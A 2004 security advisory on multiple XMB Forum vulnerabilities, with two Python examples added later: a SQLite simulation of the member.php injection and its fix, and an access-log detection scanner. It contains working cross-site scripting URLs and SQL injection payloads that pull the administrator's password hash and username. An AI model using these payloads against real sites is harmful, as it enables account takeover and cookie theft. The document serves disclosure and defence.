The OpenNET Project
 
[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)


Date: 30 Mar 2004 13:13:19 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



  Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative 
Password Disclosure)
------------------------------------------------------------------------


SUMMARY

 <http://www.xmbforum.com/> XMB Forum is "a free web-based bulletin board 
system written in PHP with a MySQL backend."

Multiple vulnerabilities have been found in XMB including several 
cross-site scripting bugs, SQL injections and information disclosure.

DETAILS

Vulnerable Systems:
 * XMB version 1.8 Partagium SP3
 * XMB version 1.9 Nexus beta

PHP and web server information disclosure
Beginning with the Nexus release of XMB, a file named phpinfo.php ships in 
the forum package. Its entire content is the call below, so anyone who can 
request the file learns the PHP version, loaded modules and web server 
details:

<?php
/* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
phpinfo();
?>

Beyond handing phpinfo() output to any visitor, the page is also a possible 
cross-site scripting vector, because phpinfo() echoes the request's variables 
(including the query string) into its output and, depending on the PHP 
version, does so unescaped. An example follows:
http://localhost/xmb19beta/phpinfo.php?foobar=<scr!pt>alert(document.cookie);</scr!pt>

Note that the SCRIPT tag has been written as SCR!PT throughout this advisory 
so that the examples are not live when rendered.

Cross site scripting
http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=a!ert(document.cookie);>

Note: log out before issuing the request, otherwise it will not work. The 
alert call has likewise been written as a!ert. Another cross-site scripting 
vulnerability exists in editprofile.php (only the latest version, 1.9, is 
vulnerable). An example request that exploits it:
http://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader=<body onload=alert(document.cookie);>

A cross site scripting bug exists in u2u.php as well. An example would be:
http://localhost/xmb19beta/u2u.php?folder=foobar"><body onload=a!ert(document.cookie);>

stats.php contains more than one cross site scripting bug, caused by the 
variables $viewmost, $replymost and $latest being used without ever being 
initialized, so a request parameter of the same name supplies their value. 
Examples:
http://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body onload=a!ert(document.cookie);>

Another XSS bug exists in post.php, where the $message and $icons variables 
are uninitialized and can therefore be supplied in the query string.

Examples:
http://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/post.php?action=newthread&fid=1&icons=<body onload=a!ert(document.cookie);>

The forumdisplay.php script also has uninitialized variables that open the 
way for cross site scripting: $threadlist, $pagelinks, $forumlist, 
$navigation and $forumdisplay. Each one is echoed into the page, so each 
accepts the same payload:
http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=<body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=<body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=<body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=<body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay=<body onload=a!ert(document.cookie);>

SQL Injection and cross site scripting
The $tpp (threads per page) value in forumdisplay.php ends up both in the 
page and in the query that selects the threads, so it serves as an SQL 
injection point as well as an XSS one:
http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=<body onload=a!ert(document.cookie);>

Note: this only works when no user is logged on; otherwise $tpp is 
overwritten with the value from the logged-in user's profile.

Both an SQL injection and a cross-site scripting bug exist in member.php 
(only version 1.9 is vulnerable). The following snippet, from line 461, 
shows the bug:

// $restrict is never set to '' before this switch: every branch appends (.=)
// to whatever value the variable already holds.
switch($self['status']){
    case 'member';
        $restrict .= " f.private !='3' AND";
        // intentional fall-through: each status inherits the restrictions below it

    case 'Moderator';

    case 'Super Moderator';
        $restrict .= " f.private != '2' AND";

    case 'Administrator';
        $restrict .= " f.userlist = '' AND f.password = '' AND";

    case 'Super Administrator';
        break;

    default:
        $restrict .= " f.private !='3' AND f.private != '2' AND f.userlist = '' AND f.password = '' AND";
        break;
}

$restrict is never initialized before the switch appends to it. With PHP's 
register_globals enabled, a request parameter named restrict becomes that 
variable, so whatever the client sends is placed ahead of the intended 
restrictions in the WHERE clause. Hence an SQL injection:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

Or a cross-site scripting if one wishes:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=<body onload=a!ert(document.cookie);>

Better yet, it is possible to retrieve the administrator's MD5 password hash 
from the database. The payload closes the original WHERE clause with a 
condition that matches nothing, UNIONs in a row from the members table with 
the same column count as the original query, and comments out the rest of 
the statement with /*. It assumes the default xmb_ table prefix and that the 
administrator is uid 1:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*

Or the admin's username:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT username, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
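To make the mechanics concrete, the following Python model is added here; it is not XMB's code and not part of the advisory. It mirrors the switch above in SQLite, seeds $restrict from the request the way register_globals does, and runs the advisory's hash-retrieval payload against it, then shows the repaired version. The table layout, the sample rows (md5("password") as the admin hash) and the base SELECT with three columns and GROUP BY p.fid are assumptions reconstructed from the payload's shape; member.php's real query is not shown in the advisory.

```python
import sqlite3

# Constructed sample data: the administrator is uid 1, as the advisory's
# payload assumes, and the stored hash is md5("password").
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# The advisory's payload exactly as it appears in the ?restrict= parameter.
PAYLOAD = (" f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 "
           "FROM xmb_members WHERE uid=1 LIMIT 1 /*")


def make_db():
    """Assumed schema; only the column names used by the payload are taken from the advisory."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE xmb_forums  (fid INTEGER, name TEXT, private TEXT, userlist TEXT, password TEXT);
        CREATE TABLE xmb_posts   (pid INTEGER, fid INTEGER, author TEXT);
        CREATE TABLE xmb_members (uid INTEGER, username TEXT, password TEXT);
        INSERT INTO xmb_forums  VALUES (1, 'General', '1', '', ''), (2, 'Staff only', '2', '', '');
        INSERT INTO xmb_posts   VALUES (1, 1, 'waraxe'), (2, 1, 'waraxe'), (3, 2, 'admin');
        INSERT INTO xmb_members VALUES (1, 'admin', '{ADMIN_HASH}'), (2, 'waraxe', 'deadbeef');
    """)
    return db


# The member.php switch as data: a status gets its own fragment plus every
# fragment below it (the fall-through); an unknown status (guest) gets all of them.
LEVELS = ["member", "Moderator", "Super Moderator", "Administrator", "Super Administrator"]
FRAGMENTS = {
    "member": " f.private !='3' AND",
    "Super Moderator": " f.private != '2' AND",   # 'Moderator' falls through into this one
    "Administrator": " f.userlist = '' AND f.password = '' AND",
}


def restrict_for(status, restrict):
    """Mirror of the vulnerable code: appends to `restrict` instead of starting from ''."""
    start = LEVELS.index(status) if status in LEVELS else 0
    for level in LEVELS[start:]:
        restrict += FRAGMENTS.get(level, "")
    return restrict


# Assumed base query: three columns and GROUP BY p.fid, matching the payload's shape.
BASE = "SELECT f.name, f.fid, COUNT(p.pid) FROM xmb_posts p, xmb_forums f WHERE"


def viewpro_forums_vulnerable(db, status, member, query_params):
    """register_globals turns ?restrict=... into $restrict, so the client seeds the clause."""
    restrict = restrict_for(status, query_params.get("restrict", ""))
    sql = BASE + restrict + " p.fid = f.fid AND p.author = '" + member + "' GROUP BY p.fid"
    return db.execute(sql).fetchall()


def viewpro_forums_fixed(db, status, member, _query_params):
    """Fix: the clause starts from '' on the server, and user data is bound, not spliced."""
    restrict = restrict_for(status, "")            # the request cannot reach $restrict
    sql = BASE + restrict + " p.fid = f.fid AND p.author = ? GROUP BY p.fid"
    return db.execute(sql, (member,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(viewpro_forums_vulnerable(db, "guest", "waraxe", {"restrict": PAYLOAD}))
    # -> [('5f4dcc3b5aa765d61d8327deb882cf99', None, 99)]: the admin's hash, not forum rows
    print(viewpro_forums_fixed(db, "guest", "waraxe", {"restrict": PAYLOAD}))
    # -> [('General', 1, 2)]
```

The first SELECT returns no groups because f.private=-99 matches nothing, so the only row the page renders is the one the UNION supplies, with the hash in the column where the forum name would normally appear. Initializing $restrict to an empty string removes the injection point, but the fixed version also binds the member name because the same splice-into-SQL habit is what lets any other parameter become the next injection.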

Yet more SQL injections and XSS vulnerabilities exist, this time through the 
$restrict variable of the misc.php script (only version 1.9 is vulnerable). 
The search query there has 23 columns, so the UNION must supply 23 values. 
Examples follow:
http://localhost/xmb19beta/misc.php?action=search&restrict=<body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/misc.php?action=search&restrict= private=-99 UNION SELECT null, null,password, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,null FROM xmb_members WHERE uid=1 LIMIT 1 /*

today.php has the same SQL injection and XSS through $restrict; again only 
version 1.9 is vulnerable:
http://localhost/xmb19beta/today.php?restrict=<body onload=alert(document.cookie);>
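Every request above has a property a defender can use without looking at the payload at all: the parameter names the advisory lists as uninitialized (restrict, tpp, viewmost, threadlist and so on) are never part of a legitimate URL for those scripts, so their mere presence in an access log identifies a probe. The scanner below is an added example, not part of the advisory or of XMB; it combines that allowlist check with the payload shapes shown above, URL-decoded, and runs over a few constructed Apache-style log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query-string names the advisory lists as uninitialised variables per script.
# XMB never reads them from the URL, so a request carrying one is a probe.
UNEXPECTED_PARAMS = {
    "member.php": {"restrict"},
    "misc.php": {"restrict"},
    "today.php": {"restrict"},
    "stats.php": {"viewmost", "replymost", "latest"},
    "forumdisplay.php": {"threadlist", "pagelinks", "forumlist", "navigation", "forumdisplay", "tpp"},
}

# Payload shapes taken from the advisory's examples, matched after URL decoding.
PAYLOAD_PATTERNS = [
    ("sql-union", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("sql-comment", re.compile(r"/\*|--\s")),
    ("xss-body-onload", re.compile(r"<\s*body[^>]*onload", re.I)),
    ("xss-script", re.compile(r"<\s*script", re.I)),
]

# Apache common/combined log prefix; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic): one benign request, then the
# advisory's member.php hash retrieval, a stats.php XSS probe and a phpinfo.php hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Mar/2004:13:13:19 +0200] "GET /xmb19beta/forumdisplay.php?fid=1 HTTP/1.1" 200 8120',
    '10.0.0.9 - - [30/Mar/2004:13:14:02 +0200] "GET /xmb19beta/member.php?action=viewpro&member=waraxe'
    '&restrict=%20f.private%3D-99%20GROUP%20BY%20p.fid%20UNION%20SELECT%20password,%20null,99'
    '%20FROM%20xmb_members%20WHERE%20uid%3D1%20LIMIT%201%20/* HTTP/1.1" 200 4310',
    '10.0.0.9 - - [30/Mar/2004:13:14:40 +0200] "GET /xmb19beta/stats.php?action=view'
    '&latest=%22%3E%3C/textarea%3E%3Cbody%20onload%3Dalert(document.cookie)%3B%3E HTTP/1.1" 200 3902',
    '10.0.0.9 - - [30/Mar/2004:13:15:11 +0200] "GET /xmb19beta/phpinfo.php HTTP/1.1" 200 40210',
]


def analyse_request(url):
    """Reasons (possibly none) a single request URL looks like one of the advisory's probes."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qs(parts.query, keep_blank_values=True)   # also %xx-decodes the values
    reasons = []
    if script == "phpinfo.php":
        reasons.append("phpinfo.php reached")
    for name in sorted(set(params) & UNEXPECTED_PARAMS.get(script, set())):
        reasons.append("unexpected parameter " + name)
    decoded = " ".join(v for values in params.values() for v in values)
    for label, pattern in PAYLOAD_PATTERNS:
        if pattern.search(decoded):
            reasons.append(label)
    return reasons


def scan_log(lines):
    """(line number, client ip, script path, reasons) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = analyse_request(match["url"])
        if reasons:
            findings.append((number, match["ip"], match["url"].split("?", 1)[0], reasons))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only GET requests are visible this way: the post.php parameters are omitted from the allowlist because a normal form submission sends $message and $icons in a POST body that an access log does not record. The phpinfo.php rule fires on any hit, since the file has no legitimate use on a production forum and the advisory's recommendation amounts to removing it.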


ADDITIONAL INFORMATION

The information has been provided by Janek Vind <mailto:[email protected]>.





DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



